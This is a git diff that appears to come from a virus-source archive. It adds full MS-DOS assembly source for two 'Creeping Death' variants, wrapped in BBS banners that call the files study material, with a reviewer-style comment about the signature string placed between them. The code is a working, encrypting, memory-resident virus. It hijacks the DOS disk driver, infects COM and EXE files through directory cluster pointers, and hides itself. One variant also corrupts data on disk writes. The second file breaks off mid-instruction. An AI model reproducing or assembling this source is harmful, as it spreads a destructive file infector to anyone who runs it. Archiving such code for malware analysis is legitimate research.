+; -=] SysOp: Peter Venkman [=- ;
+; -=] CoSysOp: Northstar Ken [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
+
+;*****************************************************************************;
+; ;
+; Creeping Death V (Encrypting, try to find it) ;
+; (Version 4 bug Fixed) :
+; (c) Copyright 1992 by Bit Addict ;
+; ;
+;*****************************************************************************;
+
+code segment public 'code'
+ assume cs:code, ds:code, es:code
+ org 5ch
+
+;*****************************************************************************;
+; ;
+; Data ;
+; ;
+;*****************************************************************************;
+
+BPB_Buf: db 32 dup(?) ; buffer for BPB
+EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
+
+Request equ this dword ; address of the request header
+RequestOffset dw ?
+RequestSegment dw ?
+
+ org 100h
+
+;*****************************************************************************;
+; ;
+; Actual start of virus.
In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov si,offset Main-1 + mov cx,400h-11 +Repeat: xor byte ptr [si],0 + inc si + loop Repeat + +Main: mov sp,600h ; init stack + inc Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? 
+ jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. 
; +; ; +;*****************************************************************************; + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 + jnb Exec + mov ax,cs + dec ax + mov ds,ax + mov cx,8 + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cx + and cx,7 +NextByte: mov si,8 + inc di + push di + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di + cmp byte ptr es:[di-1],0 + jne BeginName + mov si,di + mov bx,es + jmp short Exec + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz Exit + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header + movsw + lodsw + mov es:StrBlock,ax + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; =0 ? 
+ jz Boot + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax + mov di,1 +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h +Exit: mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. 
; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx + mov cs:RequestSegment,es + retf + +Interrupt: push ax ; driver strategy block + push bx + push cx ; save registers + push dx + push si + push di + push ds + push es + + les bx,cs:Request + push es + pop ds + mov al,ds:[bx+2] ; Command Code + + cmp al,4 ; Input + je Input + cmp al,8 ; Output + je Output + cmp al,9 + je Output + + call DoRequest + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: mov cx,0ff09h ; check if disk changed + call check + jz InfectSector ; no, just infect sector + call DoRequest ; yes, write virus to disk + jmp short inf_dsk + +InfectSector: jmp _InfectSector ; infect sector +Read: jmp _Read ; read sector +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jz Read ; no, read sector +inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +save: lodsw + push ax + loop save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + 
mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz more ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +more: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? + sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok +SmallModel: not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] + and ax,di + mov dx,di ; allocate cluster + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je _Read_ ; yes, don't write it and go on + mov dx,ds:[si] + push ds + push si + mov byte ptr es:[bx+2],8 ; write + call DoRequest ; write the adjusted sector to + pop si ; disk + pop ds + jnz _Read_ + call ReadSector ; read it again + cmp ds:[si],dx ; is it written correctly ? 
+ jne _Read_ ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +load: pop ax + stosw + loop load +_Read: call DoRequest ; do request + + mov cx,9 +_InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? 
+ je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +check: mov ah,ds:[bx+1] ; get number of unit +drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? 
yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae fat_16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds + push cs + pop ds + push es + push cs + pop es + cld + mov cx,12 + mov si,offset Encrypt + mov di,offset EncryptWrite2 + inc byte ptr ds:[si+8] + rep movsb + mov cl,10 + mov si,offset DoRequest + rep movsb + mov cl,12 + mov si,offset Encrypt + rep movsb + mov ax,0c31fh + stosw + pop es + jmp EncryptWrite2 + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +File: db "C:",255,0 ; the virus tries to open this + ; file + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Signature db 'CREEPING DEATH 3' ; Signature + +Header db 7 dup(?) ; this is the header for the + ; device driver + +f_name: db ? 
; Buffer for the filename used
+ ; by the exec-function
+
+;*****************************************************************************;
+; ;
+; The End ;
+; ;
+;*****************************************************************************;
+
+code ends
+
+end Encrypt
+
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] CoSysOp: Northstar Ken [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
+
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪;
+;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪;
+;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪;
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪;
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset6.asm b/MSDOS/Virus.MSDOS.Unknown.cdset6.asm
new file mode 100644
index 00000000..5ee07186
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cdset6.asm
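Review bot: `Signature db 'CREEPING DEATH 3'` in the data section carries no comment and is never referenced by name anywhere in this hunk; the only code that reaches it is `mov si,offset Header-4`, whose target falls inside the string's last four bytes and appears to serve as the link field in front of the copied device header. The file header calls this build "Creeping Death V (Version 4 bug Fixed)", so the trailing "3" reads like a leftover from an earlier variant rather than a current identifier. A one-line note on that data line saying whether the string is a deliberate marker or inherited padding would help analysts comparing the variants in this commit, and it documents a fixed plaintext artifact a detection signature can key on: `Signature db 'CREEPING DEATH 3' ; identifier string; note offset Header-4 falls inside it`.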
@@ -0,0 +1,631 @@
+;*****************************************************************************;
+; ;
+; Creeping Death III (Encrypting, try to find it) ;
+; ;
+; (c) Copyright 1992 by Bit Addict ;
+; ;
+;*****************************************************************************;
+
+code segment public 'code'
+ assume cs:code, ds:code, es:code, ss:code
+
+;*****************************************************************************;
+; ;
+; Data ;
+; ;
+;*****************************************************************************;
+
+ org 5ch ; use the space reserved for
+ ; the fcbs and command line
+ ; for more inportant data,
+ ; because we won't need this
+ ; data when the virus is
+ ; installed
+
+EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
+
+BPB_Buf db 32 dup(?) ; buffer for BPB
+
+Request equ this dword ; address of the request header
+RequestOffset dw ?
+RequestSegment dw ?
+
+
+ org 100h ; com-file starts at offset 100
+ ; hex
+
+;*****************************************************************************;
+; ;
+; Actual start of virus. In this part the virus initializes the stack and ;
+; adjusts the device driver used by dos to read and write from floppy's and ;
+; hard disks.
Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov si,offset Main-1 ; this part of the program + mov cx,400h-11 ; will decode the encoded +Repeat: xor byte ptr [si],0 ; program, so it can be + inc si ; executed + loop Repeat + +Main: mov sp,600h ; init stack + inc word ptr Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? 
+ jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 ; filename+path available ? 
+ jnb Exec ; yes, execute it + mov ax,cs ; get segment of MCB + dec ax + mov ds,ax + mov cl,8 ; count length of filename + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cl + and cl,7 +NextByte: mov si,8 ; search for this name in the + inc di ; parent PSP to find the path + push di ; to this file + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di ; name found, search for start + cmp byte ptr es:[di-1],0 ; of name+path + jne BeginName + mov si,di + mov bx,es + jmp short Exec ; execute it + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz Exit + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header ; prepare header of the viral + movsw ; device driver and save the + lodsw ; address of the dos strategy + mov es:StrBlock,ax ; and interrupt procedures + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. 
; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; environment available ? + jz Boot ; no, computer is rebooted + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax ; end of environment is marked + mov di,1 ; with two zero bytes +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset Filename ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h +Exit: mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. 
; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx ; store segment and offset of + mov cs:RequestSegment,es ; request block + retf ; return to dos (or whatever + ; called this device driver) + +Interrupt: push ax ; driver strategy block + push bx ; save registers + push cx + push dx + push si + push di + push ds + push es + + les bx,cs:Request ; es:bx = request block + push es ; ds:bx = request block + pop ds + mov al,ds:[bx+2] ; command code + + cmp al,4 ; read sector from disk + je Input + cmp al,8 ; write sector to disk + je Output + cmp al,9 + je Output + + call DoRequest ; let dos do handle the request + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: inc byte ptr cs:Random ; increase counter + jnz Skip ; zero ? 
+ push bx ; yes, change one byte in the + push ds ; sector to write + lds bx,ds:[bx+16h] + inc bh + inc byte ptr ds:[bx] ; destroy some data + pop ds + pop bx +Skip: mov cx,0ff09h + call Check ; check if disk changed + jz Disk ; yes, write virus to disk + jmp InfectSector ; no, just infect sector +Disk: call DoRequest + jmp short InfectDisk + +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jnz InfectDisk ; no, read sector + jmp Read +InfectDisk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +Save: lodsw + push ax + loop Save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz More ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +More: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? 
+ sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector + lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok + not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax ; allocate 1st cluster + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz Here + inc dx + mul dx +Here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] ; allocate last cluster + and ax,di + mov dx,di + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je DiskInfected ; yes, don't write it and go on + mov dx,ds:[si] + mov byte ptr es:[bx+2],8 ; write the adjusted sector to + call DoRequest ; disk + jnz DiskInfected + mov byte ptr es:[bx+2],4 ; read it again + call ReadSector + cmp ds:[si],dx ; is it written correctly ? 
+ jne DiskInfected ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz Less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +Less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +DiskInfected: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +Load: pop ax + stosw + loop Load +Read: call DoRequest ; do request + + mov cx,9 +InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +Find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +Com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +Found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +Pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? 
+ je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +Gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +Rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +Go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +Check: mov ah,ds:[bx+1] ; get number of unit +Drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne Changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +Changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr 